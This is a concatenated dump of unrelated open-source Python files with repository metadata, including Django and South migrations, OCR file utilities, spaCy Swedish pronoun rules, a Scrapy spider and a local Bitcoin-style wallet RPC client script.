field=models.CharField(help_text=b'Maps to pycsw:SpecificationDateType', max_length=100, null=True, blank=True),
),
]
| [
"ricardo.garcia.silva@gmail.com"
] | ricardo.garcia.silva@gmail.com |
cd1f3ab6eb02464ada9c3e0bdbb15065d1bff148 | b2755ce7a643ae5c55c4b0c8689d09ad51819e6b | /anuvaad-etl/anuvaad-extractor/document-processor/ocr/google/src/utilities/utils.py | e05f8b91eff7a7fc61d6bf08994e9e6865583968 | [
"MIT"
] | permissive | project-anuvaad/anuvaad | 96df31170b27467d296cee43440b6dade7b1247c | 2bfcf6b9779bf1abd41e1bc42c27007127ddbefb | refs/heads/master | 2023-08-17T01:18:25.587918 | 2023-08-14T09:53:16 | 2023-08-14T09:53:16 | 265,545,286 | 41 | 39 | MIT | 2023-09-14T05:58:27 | 2020-05-20T11:34:37 | Jupyter Notebook | UTF-8 | Python | false | false | 3,688 | py | import os
from pathlib import Path
import time
import json
from anuvaad_auditor.errorhandler import post_error
from anuvaad_auditor.errorhandler import post_error_wf
class FileOperation(object):
def __init__(self):
self.download_folder = None
# creating directory if it is not existed before.
def create_file_download_dir(self, downloading_folder):
self.download_folder = downloading_folder
download_dir = Path(os.path.join(os.getcwd(), self.download_folder))
if download_dir.exists() is False:
os.makedirs(download_dir)
return str(download_dir)
def accessing_files(self,files):
try:
filepath = files['name']
file_type = files['type']
identifier = files['identifier']
except Exception as e:
log_exception("accessing_files, keys not found ", LOG_WITHOUT_CONTEXT, e)
return filepath, file_type, identifier
# generating input filepath for input filename
def input_path(self, input_filename):
input_filepath = os.path.join('upload', input_filename)
return input_filepath
# extracting data from received json input
def json_input_format(self, json_data):
try:
input_data = json_data['input']['inputs']
workflow_id = json_data['workflowCode']
jobid = json_data['jobID']
tool_name = json_data['tool']
step_order = json_data['stepOrder']
except Exception as e:
log_exception("json_input_format, keys not found or mismatch in json inputs ", LOG_WITHOUT_CONTEXT, e)
return input_data, workflow_id, jobid, tool_name, step_order
# output format for individual pdf file
def one_filename_response(self,output_json_file):
file_res = {
"outputFile" : output_json_file,
"outputType" : "json"
}
return file_res
# checking file extension of received file type
def check_file_extension(self, file_type):
allowed_extensions = ['pdf']
if file_type in allowed_extensions:
return True
else:
return False
# checking directory exists or not
def check_path_exists(self, dir):
if dir is not None and os.path.exists(dir) is True:
return True
else:
return False
# generating output filepath for output filename
def output_path(self,index, DOWNLOAD_FOLDER):
output_filename = '%d-'%index + str(time.time()).replace('.', '') + '.json'
output_filepath = os.path.join(DOWNLOAD_FOLDER, output_filename)
return output_filepath , output_filename
# writing json file of service response
def writing_json_file(self, index, json_data, DOWNLOAD_FOLDER):
output_filepath , output_filename = self.output_path(index, DOWNLOAD_FOLDER)
with open(output_filepath, 'w') as f:
json_object = json.dumps(json_data)
f.write(json_object)
return output_filename
# error manager integration
def error_handler(self, object_in, code, iswf):
if iswf:
job_id = object_in["jobID"]
task_id = object_in["taskID"]
state = object_in['state']
status = object_in['status']
code = code
message = object_in['message']
error = post_error_wf(code, message, object_in , None)
return error
else:
code = object_in['error']['code']
message = object_in['error']['message']
error = post_error(code, message, None)
return error
| [
"srihari.nagaraj@tarento.com"
] | srihari.nagaraj@tarento.com |
3c258612b6a06b131dd33dde99f1d222ad80f67e | 685f4474699d769dae88537c69f5517ac13a8431 | /EL37.py | 5132902ccc1db99462685de28e9318eee8d0eb4f | [] | no_license | Pumafied/Project-Euler | 7466f48e449b7314598c106398c0be0424ae72d5 | 0c3e80a956893ce1881a9694131d52b156b9d3d8 | refs/heads/master | 2016-09-05T22:45:09.733696 | 2013-04-20T04:46:48 | 2013-04-20T04:46:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | # The number 3797 has an interesting property. Being prime itself, it is possible to continuously remove digits from left to right, and remain prime at each stage: 3797, 797, 97, and 7. Similarly we can work from right to left: 3797, 379, 37, and 3.
# Find the sum of the only eleven primes that are both truncatable from left to right and right to left.
# NOTE: 2, 3, 5, and 7 are not considered to be truncatable primes.
| [
"pumafied@gmail.com"
] | pumafied@gmail.com |
668e6428fdcf2c5b6ad771bafa1d1cda5a55e4db | f1a3bd9ad5ef76204c24dc96f113c405ece21b6d | /main/migrations/0043_auto.py | 0eb16b471a3427ab67c0d985d939e3271b099e46 | [] | no_license | JamesLinus/solidcomposer | 02f83c3731774e8008d46b418f3bf4fb5d9dab36 | ed75e576ce1c50487403437b5b537f9bfbb6397e | refs/heads/master | 2020-12-28T23:50:06.745329 | 2014-01-24T02:34:41 | 2014-01-24T02:34:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,399 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Removing M2M table for field new_competitions_bookmarked on 'Profile'
db.delete_table('main_profile_new_competitions_bookmarked')
def backwards(self, orm):
# Adding M2M table for field new_competitions_bookmarked on 'Profile'
db.create_table('main_profile_new_competitions_bookmarked', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('profile', models.ForeignKey(orm['main.profile'], null=False)),
('competition', models.ForeignKey(orm['competitions.competition'], null=False))
))
db.create_unique('main_profile_new_competitions_bookmarked', ['profile_id', 'competition_id'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'chat.chatroom': {
'Meta': {'object_name': 'ChatRoom'},
'blacklist': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'blacklisted_users'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['auth.User']"}),
'end_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'permission_type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'start_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'whitelist': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'whitelisted_users'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['auth.User']"})
},
'competitions.competition': {
'Meta': {'object_name': 'Competition'},
'chat_room': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'competition_chat_room2'", 'null': 'True', 'to': "orm['chat.ChatRoom']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {}),
'have_listening_party': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'host': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'competition_host2'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'listening_party_end_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'listening_party_start_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'preview_rules': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'preview_theme': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'rules': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'start_date': ('django.db.models.fields.DateTimeField', [], {}),
'submit_deadline': ('django.db.models.fields.DateTimeField', [], {}),
'theme': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'vote_deadline': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'vote_period_length': ('django.db.models.fields.IntegerField', [], {})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'main.accountplan': {
'Meta': {'object_name': 'AccountPlan'},
'customer_id': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'total_space': ('django.db.models.fields.IntegerField', [], {}),
'usd_per_month': ('django.db.models.fields.FloatField', [], {})
},
'main.band': {
'Meta': {'object_name': 'Band'},
'bio': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'concurrent_editing': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'folder': ('django.db.models.fields.CharField', [], {'max_length': '110', 'unique': 'True', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'openness': ('django.db.models.fields.IntegerField', [], {'default': '4'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '110', 'unique': 'True', 'null': 'True'})
},
'main.bandmember': {
'Meta': {'object_name': 'BandMember'},
'band': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Band']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'role': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'main.competition': {
'Meta': {'object_name': 'Competition'},
'chat_room': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['chat.ChatRoom']", 'null': 'True', 'blank': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {}),
'have_listening_party': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'host': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'listening_party_end_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'listening_party_start_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'preview_rules': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'preview_theme': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'rules': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'start_date': ('django.db.models.fields.DateTimeField', [], {}),
'submit_deadline': ('django.db.models.fields.DateTimeField', [], {}),
'theme': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'vote_deadline': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'vote_period_length': ('django.db.models.fields.IntegerField', [], {})
},
'main.entry': {
'Meta': {'object_name': 'Entry'},
'competition': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Competition']"}),
'edit_date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'song': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Song']"}),
'submit_date': ('django.db.models.fields.DateTimeField', [], {})
},
'main.profile': {
'Meta': {'object_name': 'Profile'},
'activate_code': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'activated': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'bio': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'competitions_bookmarked': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'competitions_bookmarked'", 'blank': 'True', 'to': "orm['competitions.Competition']"}),
'date_activity': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'plan': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.AccountPlan']", 'null': 'True'}),
'solo_band': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Band']"}),
'total_space': ('django.db.models.fields.IntegerField', [], {}),
'used_space': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'main.song': {
'Meta': {'object_name': 'Song'},
'band': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Band']"}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'length': ('django.db.models.fields.FloatField', [], {}),
'mp3_file': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'source_file': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'studio': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Studio']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'waveform_img': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'})
},
'main.songcomment': {
'Meta': {'object_name': 'SongComment'},
'content': ('django.db.models.fields.TextField', [], {}),
'date_created': ('django.db.models.fields.DateTimeField', [], {}),
'date_edited': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'main.songcommentthread': {
'Meta': {'object_name': 'SongCommentThread'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'position': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'song': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Song']"})
},
'main.studio': {
'Meta': {'object_name': 'Studio'},
'extension': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'logo_16x16': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'logo_large': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'main.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
'main.thumbsup': {
'Meta': {'object_name': 'ThumbsUp'},
'date_given': ('django.db.models.fields.DateTimeField', [], {}),
'entry': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Entry']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['main']
| [
"superjoe30@gmail.com"
] | superjoe30@gmail.com |
bd9fcd49f98ccc6899ff0965b7a991dca19906f9 | 1d928c3f90d4a0a9a3919a804597aa0a4aab19a3 | /python/spaCy/2017/8/morph_rules.py | 2875eb3c8d6f3e52d7c95b8b56099ed57ab2a886 | [
"MIT"
] | permissive | rosoareslv/SED99 | d8b2ff5811e7f0ffc59be066a5a0349a92cbb845 | a062c118f12b93172e31e8ca115ce3f871b64461 | refs/heads/main | 2023-02-22T21:59:02.703005 | 2021-01-28T19:40:51 | 2021-01-28T19:40:51 | 306,497,459 | 1 | 1 | null | 2020-11-24T20:56:18 | 2020-10-23T01:18:07 | null | UTF-8 | Python | false | false | 5,937 | py | # coding: utf8
from __future__ import unicode_literals
from ...symbols import LEMMA
from ...deprecated import PRON_LEMMA
# Used the table of pronouns at https://sv.wiktionary.org/wiki/deras
MORPH_RULES = {
"PRP": {
"jag": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Sing", "Case": "Nom"},
"mig": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Sing", "Case": "Acc"},
"mej": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Sing", "Case": "Acc"},
"du": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Sing", "Case": "Nom"},
"han": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Sing", "Gender": "Masc", "Case": "Nom"},
"honom": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Sing", "Gender": "Masc", "Case": "Acc"},
"hon": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Sing", "Gender": "Fem", "Case": "Nom"},
"henne": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Sing", "Gender": "Fem", "Case": "Acc"},
"det": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Sing", "Gender": "Neut"},
"vi": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Plur", "Case": "Nom"},
"oss": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Plur", "Case": "Acc"},
"ni": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Case": "Nom"},
"er": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Case": "Acc"},
"de": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Plur", "Case": "Nom"},
"dom": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Plur", "Case": "Nom"},
"dem": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Plur", "Case": "Acc"},
"dom": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Plur", "Case": "Acc"},
"min": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Sing", "Poss": "Yes", "Reflex": "Yes"},
"mitt": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Sing", "Poss": "Yes", "Reflex": "Yes"},
"mina": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"din": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Sing", "Poss": "Yes", "Reflex": "Yes"},
"ditt": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Sing", "Poss": "Yes", "Reflex": "Yes"},
"dina": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"hans": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Sing", "Gender": "Masc", "Poss": "Yes", "Reflex": "Yes"},
"hans": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Gender": "Masc", "Poss": "Yes", "Reflex": "Yes"},
"hennes": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Sing", "Gender": "Fem", "Poss": "Yes", "Reflex": "Yes"},
"hennes": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Gender": "Fem", "Poss": "Yes", "Reflex": "Yes"},
"dess": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Sing", "Poss": "Yes", "Reflex": "Yes"},
"dess": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"vår": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"våran": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"vårt": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"vårat": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"våra": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"er": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"eran": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"ert": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"erat": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"era": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"deras": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"}
},
"VBZ": {
"är": {"VerbForm": "Fin", "Person": "One", "Tense": "Pres", "Mood": "Ind"},
"är": {"VerbForm": "Fin", "Person": "Two", "Tense": "Pres", "Mood": "Ind"},
"är": {"VerbForm": "Fin", "Person": "Three", "Tense": "Pres", "Mood": "Ind"},
},
"VBP": {
"är": {"VerbForm": "Fin", "Tense": "Pres", "Mood": "Ind"}
},
"VBD": {
"var": {"VerbForm": "Fin", "Tense": "Past", "Number": "Sing"},
"vart": {"VerbForm": "Fin", "Tense": "Past", "Number": "Plur"}
}
}
| [
"rodrigosoaresilva@gmail.com"
] | rodrigosoaresilva@gmail.com |
141a5a6aba2ac440c8db01781017828365654ba7 | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/testData/addImport/relativeImportWithDotsOnly/foo/bar/test.after.py | 4320a3295cc73ab93a77673cd011ffa5caab9a31 | [
"Apache-2.0"
] | permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 44 | py | from .. import lib
from .baz import baz_func | [
"intellij-monorepo-bot-no-reply@jetbrains.com"
] | intellij-monorepo-bot-no-reply@jetbrains.com |
585504f0c092f229fe513fe44804077ba55e94bf | ed54290846b5c7f9556aacca09675550f0af4c48 | /python/scrapy/shiyanlougithub/shiyanlougithub/spiders/repositories.py | 1ba29b6d6b0ed95cf7b9e5c39a7ee14505332f44 | [
"Apache-2.0"
] | permissive | smallyear/linuxLearn | 87226ccd8745cd36955c7e40cafd741d47a04a6f | 342e5020bf24b5fac732c4275a512087b47e578d | refs/heads/master | 2022-03-20T06:02:25.329126 | 2019-08-01T08:39:59 | 2019-08-01T08:39:59 | 103,765,131 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | # -*- coding: utf-8 -*-
import scrapy
from shiyanlougithub.items import ShiyanlougithubItem
class RepositoriesSpider(scrapy.Spider):
name = 'repositories'
@property
def start_urls(self):
url = 'https://github.com/shiyanlou?page={}&tab=repositories'
return (url.format(i) for i in range(1,5))
def parse(self, response):
for res in response.css('li.public'):
item = ShiyanlougithubItem({
'name' : res.xpath('.//a[@itemprop="name codeRepository"]/text()').re_first("\n\s*(.*)"),
'update_time' : res.xpath('.//relative-time/@datetime').extract_first()
})
yield item
| [
"5931263123@163.com"
] | 5931263123@163.com |
b1a2440fab36e02a54c64e490fe489194f24fecc | 7101871e7a82d202483ada3053fec155ce7824a6 | /contrib/bitrpc/bitrpc.py | 578002f747ed223ae8c640ef4ebef27574474037 | [
"MIT"
] | permissive | trumpcoinsupport/TrumpCoin | 633a9992e46cab00774d01e569f4611b7f6b4b54 | 098c62ea249a63ca1cc31d5f37c6209ccdf50e2a | refs/heads/master | 2023-01-11T20:22:03.469608 | 2021-12-31T10:04:39 | 2021-12-31T10:04:39 | 194,952,065 | 15 | 14 | MIT | 2023-01-08T02:49:09 | 2019-07-03T00:24:45 | C++ | UTF-8 | Python | false | false | 9,665 | py | from jsonrpc import ServiceProxy
import sys
import string
import getpass
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:15320")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:15320")
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "encryptwallet":
try:
pwd = getpass.getpass(prompt="Enter passphrase: ")
pwd2 = getpass.getpass(prompt="Repeat passphrase: ")
if pwd == pwd2:
access.encryptwallet(pwd)
print "\n---Wallet encrypted. Server stopping, restart to run with encrypted wallet---\n"
else:
print "\n---Passphrases do not match---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a Bitcoin address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a Bitcoin address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
print access.gettransaction(data)
except:
print access.gettransaction()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
